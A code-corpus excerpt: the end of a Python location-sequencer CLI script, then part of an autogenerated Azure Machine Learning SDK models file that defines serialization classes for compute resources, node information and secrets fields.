def main():
parser = argparse.ArgumentParser()
parser.add_argument("--state_store",
nargs="?",
default="/tmp/location-sequencer-state",
help="path to a file to store the sequencer's state")
parser.add_argument("--map", "-m",
action="append",
dest="location_mapping_rules",
metavar="RULE",
help="location mapping rule: number of tablet servers per specified "
"location in form <location>:<number>; this option may be specified "
"multiple times")
parser.add_argument("--relaxed",
action="store_true",
help="whether to allow more location assignments than specified "
"by the specified mapping rules")
parser.add_argument("uid",
help="hostname, IP address, or any other unique identifier")
args = parser.parse_args()
location = get_location(args.state_store,
LocationAssignmentRule(args.location_mapping_rules), args.uid, args.relaxed)
print(location)
if __name__ == "__main__":
main()
|
sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_models_py3.py
|
rsdoherty/azure-sdk-for-python
| 2,728 |
129354
|
<reponame>rsdoherty/azure-sdk-for-python<filename>sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_models_py3.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._azure_machine_learning_workspaces_enums import *
class Compute(msrest.serialization.Model):
"""Machine Learning compute object.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AKS, AmlCompute, ComputeInstance, DataFactory, DataLakeAnalytics, Databricks, HDInsight, VirtualMachine.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
}
_subtype_map = {
'compute_type': {'AKS': 'AKS', 'AmlCompute': 'AmlCompute', 'ComputeInstance': 'ComputeInstance', 'DataFactory': 'DataFactory', 'DataLakeAnalytics': 'DataLakeAnalytics', 'Databricks': 'Databricks', 'HDInsight': 'HDInsight', 'VirtualMachine': 'VirtualMachine'}
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
**kwargs
):
super(Compute, self).__init__(**kwargs)
self.compute_type = None # type: Optional[str]
self.compute_location = compute_location
self.provisioning_state = None
self.description = description
self.created_on = None
self.modified_on = None
self.resource_id = resource_id
self.provisioning_errors = None
self.is_attached_compute = None
class AKS(Compute):
"""A Machine Learning compute based on AKS.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties: AKS properties.
:type properties: ~azure.mgmt.machinelearningservices.models.AKSProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'AKSProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["AKSProperties"] = None,
**kwargs
):
super(AKS, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'AKS' # type: str
self.properties = properties
class ComputeSecrets(msrest.serialization.Model):
"""Secrets related to a Machine Learning compute. Might differ for every type of compute.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AksComputeSecrets, DatabricksComputeSecrets, VirtualMachineSecrets.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
}
_subtype_map = {
'compute_type': {'AKS': 'AksComputeSecrets', 'Databricks': 'DatabricksComputeSecrets', 'VirtualMachine': 'VirtualMachineSecrets'}
}
def __init__(
self,
**kwargs
):
super(ComputeSecrets, self).__init__(**kwargs)
self.compute_type = None # type: Optional[str]
class AksComputeSecrets(ComputeSecrets):
"""Secrets related to a Machine Learning compute based on AKS.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param user_kube_config: Content of kubeconfig file that can be used to connect to the
Kubernetes cluster.
:type user_kube_config: str
:param admin_kube_config: Content of kubeconfig file that can be used to connect to the
Kubernetes cluster.
:type admin_kube_config: str
:param image_pull_secret_name: Image registry pull secret.
:type image_pull_secret_name: str
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'user_kube_config': {'key': 'userKubeConfig', 'type': 'str'},
'admin_kube_config': {'key': 'adminKubeConfig', 'type': 'str'},
'image_pull_secret_name': {'key': 'imagePullSecretName', 'type': 'str'},
}
def __init__(
self,
*,
user_kube_config: Optional[str] = None,
admin_kube_config: Optional[str] = None,
image_pull_secret_name: Optional[str] = None,
**kwargs
):
super(AksComputeSecrets, self).__init__(**kwargs)
self.compute_type = 'AKS' # type: str
self.user_kube_config = user_kube_config
self.admin_kube_config = admin_kube_config
self.image_pull_secret_name = image_pull_secret_name
class AksNetworkingConfiguration(msrest.serialization.Model):
"""Advance configuration for AKS networking.
:param subnet_id: Virtual network subnet resource ID the compute nodes belong to.
:type subnet_id: str
:param service_cidr: A CIDR notation IP range from which to assign service cluster IPs. It must
not overlap with any Subnet IP ranges.
:type service_cidr: str
:param dns_service_ip: An IP address assigned to the Kubernetes DNS service. It must be within
the Kubernetes service address range specified in serviceCidr.
:type dns_service_ip: str
:param docker_bridge_cidr: A CIDR notation IP range assigned to the Docker bridge network. It
must not overlap with any Subnet IP ranges or the Kubernetes service address range.
:type docker_bridge_cidr: str
"""
_validation = {
'service_cidr': {'pattern': r'^([0-9]{1,3}\.){3}[0-9]{1,3}(\/([0-9]|[1-2][0-9]|3[0-2]))?$'},
'dns_service_ip': {'pattern': r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'},
'docker_bridge_cidr': {'pattern': r'^([0-9]{1,3}\.){3}[0-9]{1,3}(\/([0-9]|[1-2][0-9]|3[0-2]))?$'},
}
_attribute_map = {
'subnet_id': {'key': 'subnetId', 'type': 'str'},
'service_cidr': {'key': 'serviceCidr', 'type': 'str'},
'dns_service_ip': {'key': 'dnsServiceIP', 'type': 'str'},
'docker_bridge_cidr': {'key': 'dockerBridgeCidr', 'type': 'str'},
}
def __init__(
self,
*,
subnet_id: Optional[str] = None,
service_cidr: Optional[str] = None,
dns_service_ip: Optional[str] = None,
docker_bridge_cidr: Optional[str] = None,
**kwargs
):
super(AksNetworkingConfiguration, self).__init__(**kwargs)
self.subnet_id = subnet_id
self.service_cidr = service_cidr
self.dns_service_ip = dns_service_ip
self.docker_bridge_cidr = docker_bridge_cidr
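# Illustrative construction of AksNetworkingConfiguration (the address ranges
# below are assumed sample values chosen to satisfy the validation patterns
# above, not values mandated by the service):
#   aks_net = AksNetworkingConfiguration(
#       subnet_id="/subscriptions/<sub>/resourceGroups/<rg>/providers/"
#                 "Microsoft.Network/virtualNetworks/<vnet>/subnets/<subnet>",
#       service_cidr="10.0.0.0/16",
#       dns_service_ip="10.0.0.10",
#       docker_bridge_cidr="172.17.0.1/16",
#   )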
class AKSProperties(msrest.serialization.Model):
"""AKS properties.
Variables are only populated by the server, and will be ignored when sending a request.
:param cluster_fqdn: Cluster full qualified domain name.
:type cluster_fqdn: str
:ivar system_services: System services.
:vartype system_services: list[~azure.mgmt.machinelearningservices.models.SystemService]
:param agent_count: Number of agents.
:type agent_count: int
:param agent_vm_size: Agent virtual machine size.
:type agent_vm_size: str
:param ssl_configuration: SSL configuration.
:type ssl_configuration: ~azure.mgmt.machinelearningservices.models.SslConfiguration
:param aks_networking_configuration: AKS networking configuration for vnet.
:type aks_networking_configuration:
~azure.mgmt.machinelearningservices.models.AksNetworkingConfiguration
"""
_validation = {
'system_services': {'readonly': True},
'agent_count': {'minimum': 1},
}
_attribute_map = {
'cluster_fqdn': {'key': 'clusterFqdn', 'type': 'str'},
'system_services': {'key': 'systemServices', 'type': '[SystemService]'},
'agent_count': {'key': 'agentCount', 'type': 'int'},
'agent_vm_size': {'key': 'agentVMSize', 'type': 'str'},
'ssl_configuration': {'key': 'sslConfiguration', 'type': 'SslConfiguration'},
'aks_networking_configuration': {'key': 'aksNetworkingConfiguration', 'type': 'AksNetworkingConfiguration'},
}
def __init__(
self,
*,
cluster_fqdn: Optional[str] = None,
agent_count: Optional[int] = None,
agent_vm_size: Optional[str] = None,
ssl_configuration: Optional["SslConfiguration"] = None,
aks_networking_configuration: Optional["AksNetworkingConfiguration"] = None,
**kwargs
):
super(AKSProperties, self).__init__(**kwargs)
self.cluster_fqdn = cluster_fqdn
self.system_services = None
self.agent_count = agent_count
self.agent_vm_size = agent_vm_size
self.ssl_configuration = ssl_configuration
self.aks_networking_configuration = aks_networking_configuration
class AmlCompute(Compute):
"""An Azure Machine Learning compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties: AML Compute properties.
:type properties: ~azure.mgmt.machinelearningservices.models.AmlComputeProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'AmlComputeProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["AmlComputeProperties"] = None,
**kwargs
):
super(AmlCompute, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'AmlCompute' # type: str
self.properties = properties
class AmlComputeNodeInformation(msrest.serialization.Model):
"""Compute node information related to a AmlCompute.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar node_id: ID of the compute node.
:vartype node_id: str
:ivar private_ip_address: Private IP address of the compute node.
:vartype private_ip_address: str
:ivar public_ip_address: Public IP address of the compute node.
:vartype public_ip_address: str
:ivar port: SSH port number of the node.
:vartype port: int
:ivar node_state: State of the compute node. Values are idle, running, preparing, unusable,
leaving and preempted. Possible values include: "idle", "running", "preparing", "unusable",
"leaving", "preempted".
:vartype node_state: str or ~azure.mgmt.machinelearningservices.models.NodeState
:ivar run_id: ID of the Experiment running on the node, if any else null.
:vartype run_id: str
"""
_validation = {
'node_id': {'readonly': True},
'private_ip_address': {'readonly': True},
'public_ip_address': {'readonly': True},
'port': {'readonly': True},
'node_state': {'readonly': True},
'run_id': {'readonly': True},
}
_attribute_map = {
'node_id': {'key': 'nodeId', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
'public_ip_address': {'key': 'publicIpAddress', 'type': 'str'},
'port': {'key': 'port', 'type': 'int'},
'node_state': {'key': 'nodeState', 'type': 'str'},
'run_id': {'key': 'runId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AmlComputeNodeInformation, self).__init__(**kwargs)
self.node_id = None
self.private_ip_address = None
self.public_ip_address = None
self.port = None
self.node_state = None
self.run_id = None
class ComputeNodesInformation(msrest.serialization.Model):
"""Compute nodes information related to a Machine Learning compute. Might differ for every type of compute.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AmlComputeNodesInformation.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:ivar next_link: The continuation token.
:vartype next_link: str
"""
_validation = {
'compute_type': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
_subtype_map = {
'compute_type': {'AmlCompute': 'AmlComputeNodesInformation'}
}
def __init__(
self,
**kwargs
):
super(ComputeNodesInformation, self).__init__(**kwargs)
self.compute_type = None # type: Optional[str]
self.next_link = None
class AmlComputeNodesInformation(ComputeNodesInformation):
"""Compute node information related to a AmlCompute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:ivar next_link: The continuation token.
:vartype next_link: str
:ivar nodes: The collection of returned AmlCompute nodes details.
:vartype nodes: list[~azure.mgmt.machinelearningservices.models.AmlComputeNodeInformation]
"""
_validation = {
'compute_type': {'required': True},
'next_link': {'readonly': True},
'nodes': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'next_link': {'key': 'nextLink', 'type': 'str'},
'nodes': {'key': 'nodes', 'type': '[AmlComputeNodeInformation]'},
}
def __init__(
self,
**kwargs
):
super(AmlComputeNodesInformation, self).__init__(**kwargs)
self.compute_type = 'AmlCompute' # type: str
self.nodes = None
class AmlComputeProperties(msrest.serialization.Model):
"""AML Compute properties.
Variables are only populated by the server, and will be ignored when sending a request.
:param vm_size: Virtual Machine Size.
:type vm_size: str
:param vm_priority: Virtual Machine priority. Possible values include: "Dedicated",
"LowPriority".
:type vm_priority: str or ~azure.mgmt.machinelearningservices.models.VmPriority
:param scale_settings: Scale settings for AML Compute.
:type scale_settings: ~azure.mgmt.machinelearningservices.models.ScaleSettings
:param user_account_credentials: Credentials for an administrator user account that will be
created on each compute node.
:type user_account_credentials:
~azure.mgmt.machinelearningservices.models.UserAccountCredentials
:param subnet: Virtual network subnet resource ID the compute nodes belong to.
:type subnet: ~azure.mgmt.machinelearningservices.models.ResourceId
:param remote_login_port_public_access: State of the public SSH port. Possible values are:
Disabled - Indicates that the public ssh port is closed on all nodes of the cluster. Enabled -
Indicates that the public ssh port is open on all nodes of the cluster. NotSpecified -
Indicates that the public ssh port is closed on all nodes of the cluster if VNet is defined,
    else is open on all public nodes. It can be default only during cluster creation time, after
creation it will be either enabled or disabled. Possible values include: "Enabled", "Disabled",
"NotSpecified". Default value: "NotSpecified".
:type remote_login_port_public_access: str or
~azure.mgmt.machinelearningservices.models.RemoteLoginPortPublicAccess
:ivar allocation_state: Allocation state of the compute. Possible values are: steady -
Indicates that the compute is not resizing. There are no changes to the number of compute nodes
in the compute in progress. A compute enters this state when it is created and when no
operations are being performed on the compute to change the number of compute nodes. resizing -
Indicates that the compute is resizing; that is, compute nodes are being added to or removed
from the compute. Possible values include: "Steady", "Resizing".
:vartype allocation_state: str or ~azure.mgmt.machinelearningservices.models.AllocationState
:ivar allocation_state_transition_time: The time at which the compute entered its current
allocation state.
:vartype allocation_state_transition_time: ~datetime.datetime
:ivar errors: Collection of errors encountered by various compute nodes during node setup.
:vartype errors: list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar current_node_count: The number of compute nodes currently assigned to the compute.
:vartype current_node_count: int
:ivar target_node_count: The target number of compute nodes for the compute. If the
allocationState is resizing, this property denotes the target node count for the ongoing resize
operation. If the allocationState is steady, this property denotes the target node count for
the previous resize operation.
:vartype target_node_count: int
:ivar node_state_counts: Counts of various node states on the compute.
:vartype node_state_counts: ~azure.mgmt.machinelearningservices.models.NodeStateCounts
"""
_validation = {
'allocation_state': {'readonly': True},
'allocation_state_transition_time': {'readonly': True},
'errors': {'readonly': True},
'current_node_count': {'readonly': True},
'target_node_count': {'readonly': True},
'node_state_counts': {'readonly': True},
}
_attribute_map = {
'vm_size': {'key': 'vmSize', 'type': 'str'},
'vm_priority': {'key': 'vmPriority', 'type': 'str'},
'scale_settings': {'key': 'scaleSettings', 'type': 'ScaleSettings'},
'user_account_credentials': {'key': 'userAccountCredentials', 'type': 'UserAccountCredentials'},
'subnet': {'key': 'subnet', 'type': 'ResourceId'},
'remote_login_port_public_access': {'key': 'remoteLoginPortPublicAccess', 'type': 'str'},
'allocation_state': {'key': 'allocationState', 'type': 'str'},
'allocation_state_transition_time': {'key': 'allocationStateTransitionTime', 'type': 'iso-8601'},
'errors': {'key': 'errors', 'type': '[MachineLearningServiceError]'},
'current_node_count': {'key': 'currentNodeCount', 'type': 'int'},
'target_node_count': {'key': 'targetNodeCount', 'type': 'int'},
'node_state_counts': {'key': 'nodeStateCounts', 'type': 'NodeStateCounts'},
}
def __init__(
self,
*,
vm_size: Optional[str] = None,
vm_priority: Optional[Union[str, "VmPriority"]] = None,
scale_settings: Optional["ScaleSettings"] = None,
user_account_credentials: Optional["UserAccountCredentials"] = None,
subnet: Optional["ResourceId"] = None,
remote_login_port_public_access: Optional[Union[str, "RemoteLoginPortPublicAccess"]] = "NotSpecified",
**kwargs
):
super(AmlComputeProperties, self).__init__(**kwargs)
self.vm_size = vm_size
self.vm_priority = vm_priority
self.scale_settings = scale_settings
self.user_account_credentials = user_account_credentials
self.subnet = subnet
self.remote_login_port_public_access = remote_login_port_public_access
self.allocation_state = None
self.allocation_state_transition_time = None
self.errors = None
self.current_node_count = None
self.target_node_count = None
self.node_state_counts = None
class AmlUserFeature(msrest.serialization.Model):
"""Features enabled for a workspace.
:param id: Specifies the feature ID.
:type id: str
:param display_name: Specifies the feature name.
:type display_name: str
:param description: Describes the feature for user experience.
:type description: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
display_name: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(AmlUserFeature, self).__init__(**kwargs)
self.id = id
self.display_name = display_name
self.description = description
class ClusterUpdateParameters(msrest.serialization.Model):
"""AmlCompute update parameters.
:param scale_settings: Desired scale settings for the amlCompute.
:type scale_settings: ~azure.mgmt.machinelearningservices.models.ScaleSettings
"""
_attribute_map = {
'scale_settings': {'key': 'properties.scaleSettings', 'type': 'ScaleSettings'},
}
def __init__(
self,
*,
scale_settings: Optional["ScaleSettings"] = None,
**kwargs
):
super(ClusterUpdateParameters, self).__init__(**kwargs)
self.scale_settings = scale_settings
class ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties(msrest.serialization.Model):
"""ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar principal_id: The principal id of user assigned identity.
:vartype principal_id: str
:ivar client_id: The client id of user assigned identity.
:vartype client_id: str
"""
_validation = {
'principal_id': {'readonly': True},
'client_id': {'readonly': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'client_id': {'key': 'clientId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties, self).__init__(**kwargs)
self.principal_id = None
self.client_id = None
class ComputeInstance(Compute):
"""An Azure Machine Learning compute instance.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
    :param compute_type: Required. The type of compute. Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties: Compute Instance properties.
:type properties: ~azure.mgmt.machinelearningservices.models.ComputeInstanceProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'ComputeInstanceProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["ComputeInstanceProperties"] = None,
**kwargs
):
super(ComputeInstance, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'ComputeInstance' # type: str
self.properties = properties
class ComputeInstanceApplication(msrest.serialization.Model):
"""Defines an Aml Instance application and its connectivity endpoint URI.
:param display_name: Name of the ComputeInstance application.
:type display_name: str
    :param endpoint_uri: Application's endpoint URI.
:type endpoint_uri: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'endpoint_uri': {'key': 'endpointUri', 'type': 'str'},
}
def __init__(
self,
*,
display_name: Optional[str] = None,
endpoint_uri: Optional[str] = None,
**kwargs
):
super(ComputeInstanceApplication, self).__init__(**kwargs)
self.display_name = display_name
self.endpoint_uri = endpoint_uri
class ComputeInstanceConnectivityEndpoints(msrest.serialization.Model):
"""Defines all connectivity endpoints and properties for a ComputeInstance.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar public_ip_address: Public IP Address of this ComputeInstance.
:vartype public_ip_address: str
:ivar private_ip_address: Private IP Address of this ComputeInstance (local to the VNET in
which the compute instance is deployed).
:vartype private_ip_address: str
"""
_validation = {
'public_ip_address': {'readonly': True},
'private_ip_address': {'readonly': True},
}
_attribute_map = {
'public_ip_address': {'key': 'publicIpAddress', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ComputeInstanceConnectivityEndpoints, self).__init__(**kwargs)
self.public_ip_address = None
self.private_ip_address = None
class ComputeInstanceCreatedBy(msrest.serialization.Model):
"""Describes information on user who created this ComputeInstance.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar user_name: Name of the user.
:vartype user_name: str
    :ivar user_org_id: Uniquely identifies the user's Azure Active Directory organization.
:vartype user_org_id: str
:ivar user_id: Uniquely identifies the user within his/her organization.
:vartype user_id: str
"""
_validation = {
'user_name': {'readonly': True},
'user_org_id': {'readonly': True},
'user_id': {'readonly': True},
}
_attribute_map = {
'user_name': {'key': 'userName', 'type': 'str'},
'user_org_id': {'key': 'userOrgId', 'type': 'str'},
'user_id': {'key': 'userId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ComputeInstanceCreatedBy, self).__init__(**kwargs)
self.user_name = None
self.user_org_id = None
self.user_id = None
class ComputeInstanceLastOperation(msrest.serialization.Model):
"""The last operation on ComputeInstance.
:param operation_name: Name of the last operation. Possible values include: "Create", "Start",
"Stop", "Restart", "Reimage", "Delete".
:type operation_name: str or ~azure.mgmt.machinelearningservices.models.OperationName
:param operation_time: Time of the last operation.
